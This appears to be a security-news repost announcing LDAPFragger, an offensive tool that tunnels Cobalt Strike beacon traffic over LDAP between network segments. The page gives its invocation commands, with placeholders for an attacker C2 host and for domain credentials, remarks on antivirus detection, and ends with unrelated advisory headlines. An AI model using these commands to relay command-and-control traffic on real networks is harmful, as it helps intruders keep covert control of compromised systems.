LDAPFragger - Command And Control Tool That Enables Attackers To Route Cobalt Strike Beacon Data Over LDAP

LDAPFragger is a Command and Control tool that enables attackers to route

From network segment A, run

LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port>    LDAPFragger --cshost <Cobalt Strike IP> --csport <External listener port> -u <username> -p <password> -d <domain FQDN>

From network segment B, run

LDAPFragger     LDAPFragger -u <username> -p <password> -d <domain FQDN>

LDAPS can be used with the --LDAPS flag, however, regular LDAP traffic is encrypted as well. Please do note that the default Cobalt Strike payload will get caught by most AVs.

Download LDAPFragger

If you like the site, please consider joining the telegram channel or supporting us on Patreon using the button below.

LDAPFragger – Command And Control Tool That Enables Attackers To Route Cobalt Strike Beacon Data Over LDAP

Original Source

Brute Ratel C4 Detected – 52[.]193[.]97[.]60:80

CISA: CISA Releases One Industrial Control Systems Advisory

CISA: CISA Adds One Known Exploited Vulnerability to Catalog

CISA: Oracle Releases Quarterly Critical Patch Update Advisory for October 2024

CISA: CISA Adds One Known Exploited Vulnerability to Catalog

Original Source

You may have missed

Brute Ratel C4 Detected – 52[.]193[.]97[.]60:80

CISA: CISA Releases One Industrial Control Systems Advisory

CISA: CISA Adds One Known Exploited Vulnerability to Catalog

CISA: Oracle Releases Quarterly Critical Patch Update Advisory for October 2024

CISA: CISA Adds One Known Exploited Vulnerability to Catalog